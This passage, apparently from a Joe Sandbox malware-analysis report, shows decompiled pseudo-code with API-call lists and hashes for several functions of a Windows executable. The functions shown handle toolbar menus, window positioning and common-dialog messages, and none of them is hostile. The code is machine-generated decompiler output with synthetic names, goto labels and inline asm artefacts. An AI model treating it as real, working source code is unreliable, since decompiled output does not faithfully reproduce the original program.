                  						 *((intOrPtr*)(_t353 - 0x180)) =  *((intOrPtr*)(_t259 + 0x98));
                  						 *(_t353 - 4) = 5;
                  						 *((intOrPtr*)(_t353 - 0x17c)) = 0x10;
                  						E00415E3F(_t259, _t347[3], _t353 - 0x180);
                  						E00415E5C(_t259, _t347[3], _t353 - 0x88);
                  						_t260 = L"ToolbarWindow32";
                  						_t339 = lstrlenW(L"ToolbarWindow32") + 1;
                  						GetClassNameW( *(_t353 - 0x160), E00405860(_t353 - 0x10, __eflags, _t339), _t339);
                  						E0040E100(L"ToolbarWindow32", _t353 - 0x10, _t339, 0xffffffff);
                  						_t340 = E0040E23A(_t260, _t353 - 0x10, _t339, _t347, __eflags,  *(_t353 - 0x160));
                  						 *(_t353 - 0x58) = _t340;
                  						__eflags = E0041744E(_t260, _t353 - 0x10, _t340, _t347, _t260);
                  						if(__eflags != 0) {
                  							L36:
                  							 *(_t353 - 4) = 4;
                  							E00414752(_t260, _t353 - 0xac, _t340, _t347, __eflags);
                  							 *(_t353 - 4) = 3;
                  							E004146E5(_t353 - 0x4c);
                  							E004055F0( &(( *(_t353 + 0xc))[0xfffffffffffffffc]));
                  							__eflags =  *((intOrPtr*)(_t353 + 8)) + 0xfffffff0;
                  							E004055F0( *((intOrPtr*)(_t353 + 8)) + 0xfffffff0);
                  							 *(_t353 - 4) = 0;
                  							E0041829E(_t260, _t353 - 0x78, _t340, _t347, __eflags);
                  							goto L37;
                  						}
                  						__eflags = _t340;
                  						if(__eflags == 0) {
                  							goto L36;
                  						}
                  						__eflags = E0041EF6A(_t340, 0x43f25c);
                  						if(__eflags == 0) {
                  							goto L36;
                  						}
                  						_t349 =  &(_t347[6]);
                  						__eflags = _t349;
                  						 *((intOrPtr*)(_t353 - 0x80)) =  *_t349;
                  						 *(_t353 - 0x54) = _t349;
                  						E0041453D( *(_t353 - 0x14), _t353 - 0x88);
                  						E004144FC(_t340, _t353 - 0x88);
                  						_t261 = E00415DF6(_t340);
                  						 *(_t353 - 0x14) = _t261;
                  						while(1) {
                  							_t261 = _t261 - 1;
                  							 *(_t353 - 0x24) = _t261;
                  							E00415E09(_t340, _t261, _t353 - 0xec);
                  							_t191 = IntersectRect(_t353 - 0xfc, _t353 - 0x88, _t353 - 0xec);
                  							__eflags = _t191;
                  							if(_t191 != 0) {
                  								break;
                  							}
                  							__eflags = _t261;
                  							if(_t261 > 0) {
                  								continue;
                  							}
                  							break;
                  						}
                  						_t350 = 0x30;
                  						E004281D0(_t340, _t353 - 0xdc, 0, _t350);
                  						 *(_t353 - 0xdc) = _t350;
                  						 *(_t353 - 0x28) = E00415E26(_t340);
                  						E00422703(_t353 - 0x3c);
                  						 *((intOrPtr*)(_t353 - 0x3c)) = 0x43ead8;
                  						 *(_t353 - 4) = 6;
                  						E00425833(_t353 - 0x3c,  *(_t353 - 0x14) - _t261, 0xffffffff);
                  						E0041F801(_t261, _t353 - 0x78, _t340, CreatePopupMenu());
                  						E004149F6(_t353 - 0x4c, _t353 - 0xac);
                  						_t351 = 0;
                  						while(1) {
                  							__eflags = _t261 -  *(_t353 - 0x14);
                  							if(__eflags >= 0) {
                  								break;
                  							}
                  							E00418F66(_t340, _t335, __eflags, _t261, _t353 - 0x20, _t353 - 0x50, _t353 - 0x1c);
                  							__eflags =  *(_t353 - 0x50) & 0x00000001;
                  							if(( *(_t353 - 0x50) & 0x00000001) != 0) {
                  								__eflags = _t351;
                  								if(_t351 == 0) {
                  									L29:
                  									_t261 = _t261 + 1;
                  									__eflags = _t261;
                  									 *(_t353 - 0x24) = _t261;
                  									continue;
                  								}
                  								 *((intOrPtr*)(_t353 - 0xd8)) = 0x100;
                  								 *((intOrPtr*)(_t353 - 0xd4)) = 0x800;
                  								L28:
                  								InsertMenuItemW( *(_t353 - 0x74), _t261, 1, _t353 - 0xdc);
                  								goto L29;
                  							}
                  							 *((intOrPtr*)(_t353 - 0xd8)) = 0x162;
                  							__eflags = E00404D40(_t353 + 8,  *((intOrPtr*)(_t353 - 0x20)));
                  							if(__eflags == 0) {
                  								E004057B0(_t261, _t353 + 0xc, _t340, _t351, __eflags);
                  							} else {
                  								E00415372(_t261, _t340, _t353 + 0xc,  *((intOrPtr*)(_t353 + 8)), 1, 0xa);
                  							}
                  							_t225 = E0040B71F(__eflags, 8);
                  							__eflags = _t225;
                  							if(_t225 == 0) {
                  								_t225 = 0;
                  								__eflags = 0;
                  							} else {
                  								 *(_t225 + 4) =  *(_t225 + 4) & 0x00000000;
                  								 *_t225 = 0x43ea08;
                  							}
                  							E00425959(_t353 - 0x3c, _t351, _t225);
                  							_t227 =  *(_t353 - 0x28);
                  							__eflags = _t227;
                  							if(_t227 == 0) {
                  								L24:
                  								_t102 = _t353 - 0xbc;
                  								 *_t102 =  *(_t353 - 0xbc) & 0x00000000;
                  								__eflags =  *_t102;
                  								goto L25;
                  							} else {
                  								_t230 = E004177AC(_t353 - 0x11c,  *((intOrPtr*)(_t227 + 4)),  *((intOrPtr*)(_t353 - 0x1c)), _t353 - 0x11c);
                  								__eflags = _t230;
                  								if(_t230 == 0) {
                  									goto L24;
                  								}
                  								CopyRect(_t353 - 0x68, _t353 - 0x10c);
                  								OffsetRect(_t353 - 0x68,  ~( *(_t353 - 0x68)),  ~( *(_t353 - 0x64)));
                  								E00415D42( *((intOrPtr*)(E00415D21(_t261, _t353 - 0x3c, _t340, _t351))), _t353 - 0xac,  *((intOrPtr*)(_t353 - 0x60)),  *((intOrPtr*)(_t353 - 0x5c)));
                  								_t262 = E00415D21(_t261, _t353 - 0x3c, _t340, _t351);
                  								_t241 = E00415D21(_t240, _t353 - 0x3c, _t340, _t351);
                  								 *_t241 = E00414B47(_t353 - 0x4c,  *_t240);
                  								E00421A9A(_t353 - 0x4c, _t353 - 0x68, GetSysColor(4));
                  								E004177CD( *(_t353 - 0x28), _t353 - 0x4c,  *((intOrPtr*)(_t353 - 0x1c)), 0, 0, 1);
                  								_t343 = E00415D21(_t262, _t353 - 0x3c, _t241, _t351);
                  								_t250 = E00415D21(_t262, _t353 - 0x3c, _t249, _t351);
                  								 *_t250 = E00414B47(_t353 - 0x4c,  *_t249);
                  								_t252 = E00415D21(_t250, _t353 - 0x3c, _t343, _t351);
                  								_t340 =  *(_t353 - 0x58);
                  								_t261 =  *(_t353 - 0x24);
                  								 *(_t353 - 0xbc) =  *_t252;
                  								L25:
                  								 *(_t353 - 0xb8) =  *(_t353 + 0xc);
                  								 *((intOrPtr*)(_t353 - 0xcc)) =  *((intOrPtr*)(_t353 - 0x20));
                  								 *((intOrPtr*)(_t353 - 0xd4)) = 0x100;
                  								_t351 = _t351 + 1;
                  								goto L28;
                  							}
                  						}
                  						E00415CDB(_t353 - 0x98,  *(_t353 - 0x54));
                  						E0041453D( *((intOrPtr*)(_t353 - 0x18)), _t353 - 0x98);
                  						E0040CEE5(_t353 - 0x78, __eflags, 0,  *((intOrPtr*)(_t353 - 0x98)),  *((intOrPtr*)(_t353 - 0x8c)),  *((intOrPtr*)(_t353 - 0x18)), 0);
                  						_t264 = 0;
                  						 *((intOrPtr*)( *((intOrPtr*)(_t353 + 0x10)))) = 0;
                  						__eflags = _t351;
                  						if(__eflags <= 0) {
                  							L35:
                  							 *(_t353 - 4) = 5;
                  							E0042271A(_t353 - 0x3c);
                  							 *(_t353 - 4) = 4;
                  							E00414752(_t264, _t353 - 0xac, 0, _t351, __eflags);
                  							 *(_t353 - 4) = 3;
                  							E004146E5(_t353 - 0x4c);
                  							E004055F0( &(( *(_t353 + 0xc))[0xfffffffffffffffc]));
                  							E004055F0( *((intOrPtr*)(_t353 + 8)) + 0xfffffff0);
                  							 *(_t353 - 4) = 0;
                  							E0041829E(_t264, _t353 - 0x78, 0, _t351, __eflags);
                  							_t348 = 1;
                  							goto L6;
                  						} else {
                  							goto L32;
                  						}
                  						do {
                  							L32:
                  							_t314 =  *(E00415D21(_t264, _t353 - 0x3c, 0, _t264));
                  							__eflags = _t314;
                  							if(_t314 != 0) {
                  								 *((intOrPtr*)( *_t314 + 4))(1);
                  							}
                  							_t264 = _t264 + 1;
                  							__eflags = _t264 - _t351;
                  						} while (__eflags < 0);
                  						goto L35;
                  					}
                  					_t361 =  *((intOrPtr*)(_t353 - 0x18)) - _t157;
                  					if( *((intOrPtr*)(_t353 - 0x18)) == _t157) {
                  						goto L7;
                  					}
                  					_t348 = E00418492(_t259, _t157, _t335, _t337, _t347, _t361,  *((intOrPtr*)(_t353 + 8)), _t347,  *((intOrPtr*)(_t353 + 0x10)));
                  					goto L6;
                  				}
                  			}


                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041849C
                  • lstrlenW.KERNEL32(ReBarWindow32,00000174), ref: 004184BC
                  • GetClassNameW.USER32(?,00000000,00000001), ref: 004184D1
                  • lstrlenW.KERNEL32(ToolbarWindow32), ref: 004185C8
                  • GetClassNameW.USER32(?,00000000,00000001), ref: 004185DE
                  • IntersectRect.USER32(?,?,?), ref: 00418687
                  • _memset.LIBCMT ref: 004186A2
                  • CreatePopupMenu.USER32 ref: 004186DD
                  • CopyRect.USER32(?,?), ref: 004187A7
                  • OffsetRect.USER32(?,?,?), ref: 004187BD
                  • GetSysColor.USER32(00000004), ref: 00418804
                  • InsertMenuItemW.USER32(?,?,00000001,?), ref: 004188B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Rect$ClassMenuNamelstrlen$ColorCopyCreateH_prolog3InsertIntersectItemOffsetPopup_memset
                  • String ID: BAA$ReBarWindow32$ToolbarWindow32
                  • API String ID: 3448309770-3490429307
                  • Opcode ID: e9bead2bbd7099e9149df2a62c8ad31fcbc705176fbe87d6e0afd6b961a43ff4
                  • Instruction ID: fe1e104b2de7a07604ead795cb21c9c30ba7bb86c74c7706002967e913af63ac
                  • Opcode Fuzzy Hash: e9bead2bbd7099e9149df2a62c8ad31fcbc705176fbe87d6e0afd6b961a43ff4
                  • Instruction Fuzzy Hash: E2E18E71900218ABDF15EBA1CC85BEEB778EF44304F10816EF916A7291DF385A84CF69
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 89%
                  			E0040DAD8(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                  				signed int _v8;
                  				intOrPtr _v12;
                  				struct tagRECT _v28;
                  				struct tagRECT _v44;
                  				struct tagRECT _v60;
                  				struct tagRECT _v80;
                  				char _v100;
                  				intOrPtr _t58;
                  				struct HWND__* _t59;
                  				intOrPtr _t94;
                  				signed int _t103;
                  				struct HWND__* _t104;
                  				void* _t105;
                  				struct HWND__* _t107;
                  				long _t108;
                  				long _t116;
                  				void* _t119;
                  				struct HWND__* _t121;
                  				void* _t123;
                  				intOrPtr _t125;
                  				intOrPtr _t129;
                  
                  				_t119 = __edx;
                  				_t105 = __ebx;
                  				_t125 = __ecx;
                  				_v12 = __ecx;
                  				_v8 = E00411D59(__ecx);
                  				_t58 = _a4;
                  				if(_t58 == 0) {
                  					if((_v8 & 0x40000000) == 0) {
                  						_t59 = GetWindow( *(__ecx + 0x20), 4);
                  					} else {
                  						_t59 = GetParent( *(__ecx + 0x20));
                  					}
                  					_t121 = _t59;
                  					if(_t121 != 0) {
                  						_t104 = SendMessageW(_t121, 0x36b, 0, 0);
                  						if(_t104 != 0) {
                  							_t121 = _t104;
                  						}
                  					}
                  				} else {
                  					_t4 = _t58 + 0x20; // 0xc033d88b
                  					_t121 =  *_t4;
                  				}
                  				_push(_t105);
                  				GetWindowRect( *(_t125 + 0x20),  &_v60);
                  				if((_v8 & 0x40000000) != 0) {
                  					_t107 = GetParent( *(_t125 + 0x20));
                  					GetClientRect(_t107,  &_v28);
                  					GetClientRect(_t121,  &_v44);
                  					MapWindowPoints(_t121, _t107,  &_v44, 2);
                  				} else {
                  					if(_t121 != 0) {
                  						_t103 = GetWindowLongW(_t121, 0xfffffff0);
                  						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
                  							_t121 = 0;
                  						}
                  					}
                  					_v100 = 0x28;
                  					if(_t121 != 0) {
                  						GetWindowRect(_t121,  &_v44);
                  						E0040B9B5(E0040B948(_t121, 2),  &_v100);
                  						CopyRect( &_v28,  &_v80);
                  					} else {
                  						_t94 = E0040CC4F();
                  						if(_t94 != 0) {
                  							_t94 =  *((intOrPtr*)(_t94 + 0x20));
                  						}
                  						E0040B9B5(E0040B948(_t94, 1),  &_v100);
                  						CopyRect( &_v44,  &_v80);
                  						CopyRect( &_v28,  &_v80);
                  					}
                  				}
                  				_t108 = _v60.left;
                  				asm("cdq");
                  				_t123 = _v60.right - _t108;
                  				asm("cdq");
                  				_t120 = _v44.bottom;
                  				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
                  				_a4 = _v60.bottom - _v60.top;
                  				asm("cdq");
                  				asm("cdq");
                  				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
                  				if(_t123 + _t116 > _v28.right) {
                  					_t116 = _t108 - _v60.right + _v28.right;
                  				}
                  				if(_t116 < _v28.left) {
                  					_t116 = _v28.left;
                  				}
                  				if(_a4 + _t129 > _v28.bottom) {
                  					_t129 = _v60.top - _v60.bottom + _v28.bottom;
                  				}
                  				if(_t129 < _v28.top) {
                  					_t129 = _v28.top;
                  				}
                  				return E00411EB6(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
                  			}


                  APIs
                    • Part of subcall function 00411D59: GetWindowLongW.USER32(?,000000F0), ref: 00411D64
                  • GetParent.USER32(?), ref: 0040DB07
                  • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 0040DB2A
                  • GetWindowRect.USER32(?,?), ref: 0040DB44
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0040DB5A
                  • CopyRect.USER32(?,?), ref: 0040DBA7
                  • CopyRect.USER32(?,?), ref: 0040DBB1
                  • GetWindowRect.USER32(00000000,?), ref: 0040DBBA
                    • Part of subcall function 0040B9B5: MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 0040B9F5
                  • CopyRect.USER32(?,?), ref: 0040DBD6
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Rect$Window$Copy$Long$ByteCharMessageMultiParentSendWide
                  • String ID: (
                  • API String ID: 1385303425-3887548279
                  • Opcode ID: 5367c2c58e5639c408e1cff9b928656fc18d553533682ec26b57bd5362be38f5
                  • Instruction ID: f685164229309e3d6bed74e72c8bc415c91bb1796b829c76184802bda3466def
                  • Opcode Fuzzy Hash: 5367c2c58e5639c408e1cff9b928656fc18d553533682ec26b57bd5362be38f5
                  • Instruction Fuzzy Hash: B9514F72D00119ABDB10DBA8DD89EEEBBB9AF48310F154126F905F3290DB74ED45CB68
                  Uniqueness

                  Uniqueness Score: 16.53%

                  C-Code - Quality: 92%
                  			E004218E7(void* __ebx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t31;
                  				signed int _t33;
                  				void* _t40;
                  				int _t46;
                  				void* _t51;
                  				intOrPtr _t52;
                  				signed int _t58;
                  				signed int* _t66;
                  				void* _t67;
                  				signed int _t68;
                  				signed int _t70;
                  
                  				_t51 = __ebx;
                  				if(_a4 != 0) {
                  					_push(_t67);
                  					_push(E0040C879);
                  					_t54 = 0x44fa10;
                  					_t68 = E0041F599(__ebx, 0x44fa10, 0, _t67, __eflags);
                  					__eflags = _t68;
                  					if(_t68 == 0) {
                  						E00413DD0(0x44fa10);
                  					}
                  					__eflags =  *(_t68 + 0x18);
                  					if(__eflags != 0) {
                  						__eflags = E0040E23A(_t51, _t54, 0, _t68, __eflags, _a4);
                  						if(__eflags == 0) {
                  							_t54 =  *(_t68 + 0x18);
                  							E0040F018( *(_t68 + 0x18), __eflags, _a4);
                  							 *(_t68 + 0x18) = 0;
                  						}
                  					}
                  					_push(_t51);
                  					_t52 = _a8;
                  					__eflags = _t52 - 0x110;
                  					if(_t52 != 0x110) {
                  						__eflags = _t52 -  *0x44fc74; // 0x0
                  						if(__eflags == 0) {
                  							L25:
                  							SendMessageW(_a4, 0x111, 0xe146, 0);
                  							_t31 = 1;
                  							__eflags = 1;
                  							goto L26;
                  						}
                  						__eflags = _t52 - 0x111;
                  						if(_t52 != 0x111) {
                  							L12:
                  							__eflags = _t52 - 0xc000;
                  							if(__eflags < 0) {
                  								L22:
                  								_t31 = 0;
                  								goto L26;
                  							}
                  							_t70 = E0040E23A(_t52, _t54, 0x110, _t68, __eflags, _a4);
                  							__eflags = _t70;
                  							if(_t70 == 0) {
                  								goto L22;
                  							}
                  							_t33 = E0041EF6A(_t70, 0x43e014);
                  							__eflags = _t33;
                  							if(_t33 == 0) {
                  								L16:
                  								__eflags = _t52 -  *0x44fc68; // 0x0
                  								if(__eflags != 0) {
                  									__eflags = _t52 -  *0x44fc6c; // 0x0
                  									if(__eflags != 0) {
                  										__eflags = _t52 -  *0x44fc64; // 0x0
                  										if(__eflags != 0) {
                  											__eflags = _t52 -  *0x44fc70; // 0x0
                  											if(__eflags != 0) {
                  												goto L22;
                  											}
                  											_t31 =  *((intOrPtr*)( *_t70 + 0x164))();
                  											goto L26;
                  										}
                  										_t58 = _a16 >> 0x10;
                  										__eflags = _t58;
                  										 *((intOrPtr*)( *_t70 + 0x16c))(_a12, _a16 & 0x0000ffff, _t58);
                  										goto L22;
                  									}
                  									_t19 = _t70 + 0x318; // 0x318
                  									_t66 = _t19;
                  									 *_t66 = _a16;
                  									_t31 =  *((intOrPtr*)( *_t70 + 0x168))();
                  									 *_t66 =  *_t66 & 0x00000000;
                  									goto L26;
                  								}
                  								_t31 =  *((intOrPtr*)( *_t70 + 0x164))(_a16);
                  								goto L26;
                  							}
                  							_t40 = E00411FAB(_t70);
                  							__eflags =  *(_t40 + 0x34) & 0x00080000;
                  							if(( *(_t40 + 0x34) & 0x00080000) != 0) {
                  								goto L22;
                  							}
                  							goto L16;
                  						}
                  						_t54 = 0x40e;
                  						__eflags = _a12 - 0x40e;
                  						if(_a12 == 0x40e) {
                  							goto L25;
                  						}
                  						goto L12;
                  					} else {
                  						 *0x44fc64 = RegisterWindowMessageW(L"commdlg_LBSelChangedNotify");
                  						 *0x44fc68 = RegisterWindowMessageW(L"commdlg_ShareViolation");
                  						 *0x44fc6c = RegisterWindowMessageW(L"commdlg_FileNameOK");
                  						 *0x44fc70 = RegisterWindowMessageW(L"commdlg_ColorOK");
                  						 *0x44fc74 = RegisterWindowMessageW(L"commdlg_help");
                  						_t46 = RegisterWindowMessageW(L"commdlg_SetRGBColor");
                  						_push(_a16);
                  						 *0x44fc78 = _t46;
                  						_push(_a12);
                  						_t31 = E0041E4C6(_t52, _t54, 0x110, RegisterWindowMessageW, _a4, 0x110);
                  						L26:
                  						return _t31;
                  					}
                  				}
                  				return 0;
                  			}


                  APIs
                  • RegisterWindowMessageW.USER32(commdlg_LBSelChangedNotify,?,0040C879), ref: 0042194D
                  • RegisterWindowMessageW.USER32(commdlg_ShareViolation,?,0040C879), ref: 00421959
                  • RegisterWindowMessageW.USER32(commdlg_FileNameOK,?,0040C879), ref: 00421965
                  • RegisterWindowMessageW.USER32(commdlg_ColorOK,?,0040C879), ref: 00421971
                  • RegisterWindowMessageW.USER32(commdlg_help,?,0040C879), ref: 0042197D
                  • RegisterWindowMessageW.USER32(commdlg_SetRGBColor,?,0040C879), ref: 00421989
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MessageRegisterWindow
                  • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                  • API String ID: 1814269913-3888057576
                  • Opcode ID: a910eea55f5e987258f0d622aaa107d9304e4b02b67e2f1b0480c7a1c125eddd
                  • Instruction ID: fbd35ba0a88401d27607b44adbbadbfb07741d6e7108afd9109f09a807b21828
                  • Opcode Fuzzy Hash: a910eea55f5e987258f0d622aaa107d9304e4b02b67e2f1b0480c7a1c125eddd
                  • Instruction Fuzzy Hash: FC41B474700229ABDF21DF21EC84AAF3BA0FB65350B50053BF94557271DB399891CB9D
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E00416EEE(intOrPtr* __ecx, struct HWND__* _a4, signed int _a8) {
                  				signed int _v8;
                  				char _v12;
                  				int _v16;
                  				intOrPtr _v20;
                  				void* __ebp;
                  				intOrPtr _t68;
                  				char _t70;
                  				int _t72;
                  				int* _t74;
                  				int _t77;
                  				intOrPtr _t85;
                  				struct HWND__* _t88;
                  				struct HWND__* _t93;
                  				struct HMENU__* _t95;
                  				struct HWND__* _t97;
                  				int _t104;
                  				intOrPtr* _t116;
                  				int* _t119;
                  				RECT* _t135;
                  				intOrPtr* _t138;
                  				signed int _t156;
                  
                  				_t120 = __ecx;
                  				_t119 = _a8;
                  				_t135 = 0;
                  				_t138 = __ecx;
                  				if(_t119 != 0) {
                  					L2:
                  					_t68 =  *((intOrPtr*)( *_t138 + 0x148))();
                  					_v20 = _t68;
                  					if(_t68 == _t135) {
                  						goto L1;
                  					}
                  					if(_a4 != _t135) {
                  						_t116 = _t68 - 0xffffff80;
                  						if( *_t116 != _t135) {
                  							 *((intOrPtr*)( *((intOrPtr*)( *_t116)) + 0x5c))(_t135);
                  						}
                  					}
                  					_t70 =  *((intOrPtr*)(_t138 + 0x88));
                  					_a8 = _t135;
                  					_v12 = _t70;
                  					if(_t70 == _t135) {
                  						L16:
                  						_t119[2] = _a8;
                  						if(_a4 == _t135) {
                  							 *(_t138 + 0xb4) = _t135;
                  							_t72 = GetDlgItem( *(_t138 + 0x20), 0xea21);
                  							_a4 = _t72;
                  							__eflags = _t72;
                  							if(_t72 != 0) {
                  								_t88 = GetDlgItem( *(_t138 + 0x20), 0xe900);
                  								__eflags = _t88;
                  								if(_t88 != 0) {
                  									SetWindowLongW(_t88, 0xfffffff4, 0xea21);
                  								}
                  								SetWindowLongW(_a4, 0xfffffff4, 0xe900);
                  							}
                  							__eflags = _t119[1];
                  							if(_t119[1] != 0) {
                  								InvalidateRect( *(_t138 + 0x20), 0, 1);
                  								_t85 =  *((intOrPtr*)(_t138 + 0xd4));
                  								__eflags = _t85 - 1;
                  								if(_t85 != 1) {
                  									__eflags = _t85 - 2;
                  									if(_t85 == 2) {
                  										 *(_t138 + 0xd8) = _t119[1];
                  									}
                  								} else {
                  									SetMenu( *(_t138 + 0x20), _t119[1]);
                  								}
                  							}
                  							_t74 = _v20 - 0xffffff80;
                  							__eflags =  *_t74;
                  							if( *_t74 != 0) {
                  								 *((intOrPtr*)( *( *_t74) + 0x5c))(1);
                  							}
                  							 *((intOrPtr*)( *_t138 + 0x150))(1);
                  							_t77 =  *_t119;
                  							__eflags = _t77 - 0xe900;
                  							if(_t77 != 0xe900) {
                  								_a4 = GetDlgItem( *(_t138 + 0x20), _t77);
                  							}
                  							ShowWindow(_a4, 5);
                  							 *(_t138 + 0x60) = _t119[5];
                  							return E00415740(_t138, 1);
                  						}
                  						 *(_t138 + 0xb4) = _t119[4];
                  						E00415740(_t138, _t135);
                  						_t93 = GetDlgItem( *(_t138 + 0x20),  *_t119);
                  						_a4 = _t93;
                  						ShowWindow(_t93, _t135);
                  						if( *((intOrPtr*)(_t138 + 0xd4)) != 1) {
                  							_t95 =  *(_t138 + 0xd8);
                  						} else {
                  							_t95 = GetMenu( *(_t138 + 0x20));
                  						}
                  						_t119[1] = _t95;
                  						if(_t95 != _t135) {
                  							InvalidateRect( *(_t138 + 0x20), _t135, 1);
                  							 *((intOrPtr*)( *_t138 + 0x70))(_t135);
                  							_t38 = _t138 + 0xe4;
                  							 *_t38 =  *(_t138 + 0xe4) & 0xfffffffe;
                  							_t156 =  *_t38;
                  						}
                  						_t119[5] =  *(_t138 + 0x60);
                  						 *(_t138 + 0x60) = _t135;
                  						_t97 = E00415E79(_t138, _t156, 0x7915);
                  						if( *_t119 != 0xe900) {
                  							_t97 = GetDlgItem( *(_t138 + 0x20), 0xe900);
                  							_a4 = _t97;
                  						}
                  						if(_a4 == 0) {
                  							return _t97;
                  						} else {
                  							return SetWindowLongW(_a4, 0xfffffff4, 0xea21);
                  						}
                  					} else {
                  						goto L7;
                  					}
                  					while(1) {
                  						L7:
                  						_t120 = _t138 + 0x84;
                  						_t135 =  *(E0040C339( &_v12));
                  						if(_t135 == 0) {
                  							goto L1;
                  						}
                  						_t104 = GetDlgCtrlID( *(_t135 + 0x20));
                  						_t12 = _t104 - 0xe800; // -59392
                  						_v16 = _t104;
                  						if(_t12 <= 0x1f) {
                  							_t14 = _t104 - 0xe800; // -59392
                  							_v8 = 1 << _t14;
                  							if( *((intOrPtr*)(_t135->left + 0x168))() != 0) {
                  								_a8 = _a8 | _v8;
                  							}
                  							if( *((intOrPtr*)(_t135->left + 0x170))() == 0 || _v16 != 0xe81f) {
                  								E004168E3(_t138, _t135, _t119[2] & _v8, 1);
                  							}
                  						}
                  						if(_v12 != 0) {
                  							continue;
                  						} else {
                  							_t135 = 0;
                  							goto L16;
                  						}
                  					}
                  				}
                  				L1:
                  				E00413DD0(_t120);
                  				goto L2;
                  			}

                  APIs
                  • GetDlgCtrlID.USER32(?), ref: 00416F56
                  • GetDlgItem.USER32(?,?), ref: 00416FE1
                  • ShowWindow.USER32(00000000,00000000), ref: 00416FEC
                  • GetMenu.USER32(?), ref: 00416FFE
                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00417019
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                    • Part of subcall function 00415E79: LoadAcceleratorsW.USER32(?,?), ref: 00415E8D
                  • GetDlgItem.USER32(?,0000E900), ref: 00417050
                  • SetWindowLongW.USER32(00000000,000000F4,0000EA21), ref: 0041706D
                  • GetDlgItem.USER32(0000EA21,0000EA21), ref: 00417086
                  • GetDlgItem.USER32(0000E900,0000E900), ref: 0041709C
                  • SetWindowLongW.USER32(00000000,000000F4,0000EA21), ref: 004170AE
                  • SetWindowLongW.USER32(?,000000F4,0000E900), ref: 004170BA
                  • InvalidateRect.USER32(00000001,00000000,00000001), ref: 004170CD
                  • SetMenu.USER32(00000000,00000000), ref: 004170E4
                  • GetDlgItem.USER32(00000000,00000000), ref: 00417126
                  • ShowWindow.USER32(?,00000005), ref: 00417134
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ItemWindow$Long$InvalidateMenuRectShow$AcceleratorsCtrlException@8LoadThrow
                  • String ID:
                  • API String ID: 1210699209-0
                  • Opcode ID: 8a194de7c4c016920278b8844ccd7351c3199abfb985d7114d7ff90eb678e5c3
                  • Instruction ID: a949d6e83fd856d0034ff5a3a90e0e52e4b6eb01945590dd1165a8c6749a0204
                  • Opcode Fuzzy Hash: 8a194de7c4c016920278b8844ccd7351c3199abfb985d7114d7ff90eb678e5c3
                  • Instruction Fuzzy Hash: 74817E30600700EFCB219F68CC88A9ABBF5FF88710F14896AF556DB2A0D775D991CB54
                  Uniqueness

                  Uniqueness Score: 0.73%

                  C-Code - Quality: 81%
                  			E0041BD5E(intOrPtr* __ecx, void* __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                  				intOrPtr* _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				intOrPtr* _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				signed int _v36;
                  				void* _v40;
